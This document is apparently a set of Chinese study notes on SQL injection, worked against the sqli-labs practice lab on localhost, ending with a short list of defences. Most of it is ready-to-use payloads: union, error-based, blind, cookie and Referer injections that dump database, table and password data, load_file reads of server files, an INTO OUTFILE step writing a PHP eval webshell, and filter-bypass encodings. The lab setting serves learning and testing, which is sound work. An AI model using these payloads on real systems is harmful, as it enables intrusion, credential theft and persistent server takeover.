分类
按照请求方法分类:GET、POST
按照SQL数据类型分类:整型注入、字符型注入
其他的数据类型:报错注入、双注入(用到了两个SELECT)、
时间盲注、Cookie注入、User-Agent注入
【盲注】:时间盲注、布尔盲注
注入方法
1、判断是否有注入(判断是否未严格校验)-->第一要素
1)可控参数的改变能否影响页面的显示结果
2)输入的SQL语句是否能报错---能通过数据库的报错,看到数据库的一些语句痕迹
(select username,password form user where id='?'#‘limit 0,1)
3)输入的SQL语句能否不报错---我们的语句能成功闭合
?id=1
2、什么类型的注入
3、语句是否能被恶意修改-->第二个要素
4、是否能成功执行-->第三个要素
5、获取想要的数据
数据库->表->字段->值
information_schema,challenges,mysql,performance_schema,security,sys
emails,referers,uagents,users
#查询有几列:1,2,3只是起到一个占位的作用
http://localhost/sqli-labs/Less-2/?id=4 union select 1,2,3 %23
---------------------------------------------------------------------------------------------------------------------------------
整型注入
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,2,3 %23
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,user(),3 from information_schema.schemata %23
#查询所有数据库
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata %23
#查询当前数据库
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,database(),3 from information_schema.schemata %23
#查询当前数据库中的所有表
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
#查询当前表中的所有字段
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' %23
#查询当前字段中的所有数据
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(concat_ws('——',username,password)),3 from security.users %23
字符型注入(单引号,双引号,括号)
http://localhost/sqli-labs/Less-1/?id=1' %23
http://localhost/sqli-labs/Less-1/?id=1' order by 3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,group_concat(concat_ws('——',id,username,password)),3 from security.users %23
http://localhost/sqli-labs/Less-4/?id=1" ) %23
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,database(),3 from information_schema.schemata %23
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-labs/Less-4/?id=-1" ) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' %23
http://localhost/sqli-labs/Less-4/?id=-1" ) union select 1,group_concat(concat_ws('——',username,password)),3 from security.users %23
POST注入(登录框)
将登录框内的语句闭合即可
用BP抓包并用repeater修改、发送
报错注入
函数解释:
extractvalue();从目标XML中返回包含所查询值的字符串
EXTRACTVALUE(XML_document,XPath_string);
第一个参数:XML_document是string格式,为XML文档对象的名称,文中为DOc
第二个参数:XPath-string(Xpath格式的字符串)
concat:返回结果为连接参数产生的字符串
UPDATEXML(XML_document,Xpath_string,new_value);
第一个参数:XML_document是string格式,为XML文档对象的名称,文中为DOc
第二个参数:XPath_string(Xpath格式的字符串),如果不了解Xpath语法,可以在网上查找数据
第三个参数:new_value,string格式,替换查找到符合条件的数据
uname=' union select 1,extractvalue(1,concat(0x7e,(select version()))) %23&passwd=admin&submit=Submit
uname=' union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ) ) ) %23&passwd=admin&submit=Submit
uname=' union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()) ),1 ) %23&passwd=admin&submit=Submit
双注入(前台不能回显,要靠报错来得到数据库信息)
uname=admin' union select 1,count(1) from information_schema.tables group by floor(rand()*2) %23&passwd=12345&submit=Submit
(count(1)是统计行数,rand()*2不是0就是1,group by 是进行分组)
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),version()) %23&passwd=12345&submit=Submit
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1)) %23&passwd=12345&submit=Submit
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)) %23&passwd=12345&submit=Submit
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select username from security.users limit 0,1)) %23&passwd=12345&submit=Submit
#也可以直接用users
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select username from users limit 0,1)) %23&passwd=12345&submit=Submit
布尔盲注
http://localhost/sqli-labs/Less-5/?id=-1' or (select substr(version(),1,1) = 'a') %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select substr(version(),1,1) = '5') %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select 1 from information_schema.tables where table_schema =database() and substr(table_name,1,1)='a' limit 0,1) %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select 1 from information_schema.tables where table_schema =database() and substr(table_name,1,1)='u' limit 0,1) %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema =database() limit 0,1) =109 %23
#用BP抓包,发送到intruder对ASCII码进行爆破
时间盲注
http://localhost/sqli-labs/Less-9/?id=1' or if((select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema =database() limit 0,1)=101,sleep(2),0) %23
Cookie注入
Cookie: uname=admin' and 0 union select 1,2,3 %23
Cookie: uname=admin' and 0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema =database() %23
Cookie: uname=admin' and 0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema =database() and table_name='users' %23
Cookie: uname=admin' and 0 union select 1,group_concat(concat_ws(":",username,password)),3 from users %23
HTTP-Referer注入
insert into xxx(a,b,c)values('' and extractvalue(1,concat(0x7e,@@version)) and ''','')
Referer: http://localhost/sqli-labs/Less-19/' and extractvalue(1,concat(0x7e,@@version)) and '
insert into xxx(a,b,c)values('' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1))) and '','')
' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = database() limit 0,1))) and '
' and extractvalue(1,concat(0x7e,(select group_concat(id) from emails ))) and '
通过SQL注入读写文件
Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。
使用条件:
A、必须有权限读取并且文件必须完全可读
B、欲读取文件必须在服务器上
C、必须指定文件完整的路径
D、欲读取文件必须小于 max_allowed_packet
http://localhost/sqli-labs/Less-1/?id=1' order by 3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,load_file("index.php"),3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,load_file("d://boot.ini") %23 http://localhost/sqli-labs/Less-1/index.php/?id=-1' union select 1,2,load_file("D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-1\\index.php") %23
#获取源码
http://localhost/sqli-labs/Less-1/index.php/?id=-1' union select 1,2,hex(load_file("D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\index.php")) %23
http://localhost/sqli-labs/Less-7/?id=1')) order by 3 %23
http://localhost/sqli-labs/Less-7/?id=1')) union select 1,2,3 into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\a.txt" %23
#写入木马
http://localhost/sqli-labs/Less-7/?id=1')) union select 1,2,"<?php @eval($_POST[value]);?>" into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\a.txt" %23
#绕过注释符过滤
select * from xx where id=''='' limit 0,1
http://localhost/sqli-labs/Less-23/?id=1'='
http://localhost/sqli-labs/Less-23/?id=1' or (extractvalue(1,concat(0x7e,version()))) or '
http://localhost/sqli-labs/Less-23/?id=1' or (extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)))) or '
http://localhost/sqli-labs/Less-23/?id=-1' union select 1,version(),'
绕过and-or字符过滤
http://localhost/sqli-labs/Less-25/?id=-1' union select 1,user(),3 %23
http://localhost/sqli-labs/Less-25/?id=-1' || 1%23
http://localhost/sqli-labs/Less-25/?id=-1' || (extractvalue(1,concat(0x7e,version()))) %23
绕过空格注入
%09 tab键
%0a 新建一行
%0c 新的一页
%0d retuen 功能
%0b tab键(垂直)
%a0 空格
/**/ 代替空格
http://localhost/sqli-labs/Less-26/?id=1' || (select%a01) || '
内联注释绕过
http://localhost/sqli-labs/Less-27/?id=1'%a0or%a01=1%a0or '
#更改大小写
http://localhost/sqli-labs/Less-27/?id=1'%a0UniOn%a0SelEct%a01,2'
#过滤关键字(可能有多次)
http://localhost/sqli-labs/Less-27/?id=1'%a0ununionion%a0seselectlect%a01,2'
#内联注释
http://localhost/sqli-labs/Less-27/?id=1'%a0/*!union*/%a0//**!SElect*/%a01,2'
宽字节注入
GBK编码 835c
http://localhost/sqli-labs/Less-32/?id=1%81' %23
http://localhost/sqli-labs/Less-32/?id=-1%81' union select 1,version(),3%23
http://localhost/sqli-labs/Less-32/?id=-1%81' union select 1,user(),3%23
过滤函数绕过(综合)
uname='=(select(1)from(admin)where(substr((passwd)from(30)))='cf')='&passwd=admin
#用BP对字符串中的字符一个个爆破
SQL注入防御手段
代码层:
黑名单
白名单
敏感字符过滤
使用框架安全查询
规范输出
配置层
开启GPC
使用UTF-8
物理层
WAF
数据库审计
云防护
IPS(入侵防御系统)